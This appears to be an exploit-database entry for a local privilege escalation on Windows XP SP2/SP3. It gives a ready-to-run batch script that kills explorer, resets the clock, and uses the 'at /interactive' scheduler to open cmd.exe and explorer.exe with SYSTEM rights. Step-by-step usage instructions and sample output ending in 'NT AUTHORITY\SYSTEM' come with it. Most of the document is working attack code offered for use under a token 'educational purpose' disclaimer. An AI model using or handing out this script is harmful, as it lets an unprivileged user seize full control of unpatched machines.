# Microsoft WinXP sp2/sp3 local system privilege escalation exploit # # Platform: Windows XP SP2/SP3 # Type: local # Exploit Author: Todor Donev [email protected] # # Good luck and Have fun!! # Kind regards to so sweet baby Tsvetelina Emirska # Thank you Lina and thanks that all my friends are beside # me and support me everytime. # # Description: # # Copy the batch code in newfile with format .cmd or .bat and # then start it, wait few seconds and press any key! # This exploit kill explorer then use "at" for execute # explorer.exe, cmd.exe and change your profile with System user privilege. # # # # Use whoami.exe for checking of your user privileges. # Download: # http://www.microsoft.com/downloads/en/details.aspx?FamilyID=3E89879D-6C0B-4F92-96C4-1016C187D429 # # # !! USE AT YOUR 0WN RISK !! # !! ONLY FOR EDUCATIONAL PURPOSE !! # # + Microsoft WinXP sp2/sp3 local system privilege escalation exploit # # Added a new job with job ID = 1 # Added a new job with job ID = 2 # Added a new job with job ID = 3 # �Added a new job with job ID = 4 # Added a new job with job ID = 5 # Added a new job with job ID = 6 # �Added a new job with job ID = 7 # Added a new job with job ID = 8 # Added a new job with job ID = 9 # �Added a new job with job ID = 10 # Added a new job with job ID = 11 # Added a new job with job ID = 12 # �* Backup time # The current time is: 13:36:57,67 # Enter the new time: 13:44 # # C:\WINDOWS\system32>whoami # NT AUTHORITY\SYSTEM # ############## CUT HERE ########################### @echo off echo + Microsoft WinXP sp2/sp3 local system privilege escalation exploit start time /T > time.txt tskill explorer time 13:36:59 > nul at 13:37 /interactive cmd.exe at 13:37 /interactive explorer.exe at 13:37 /interactive at /del /y cls at 13:37 /interactive cmd.exe at 13:37 /interactive explorer.exe at 13:37 /interactive at /del /y cls at 13:37 /interactive cmd.exe at 13:37 /interactive explorer.exe at 13:37 /interactive at /del /y cls at 13:37 /interactive cmd.exe at 13:37 /interactive explorer.exe at 13:37 /interactive at /del /y echo * Backup time time < time.txt ############## CUT HERE ###########################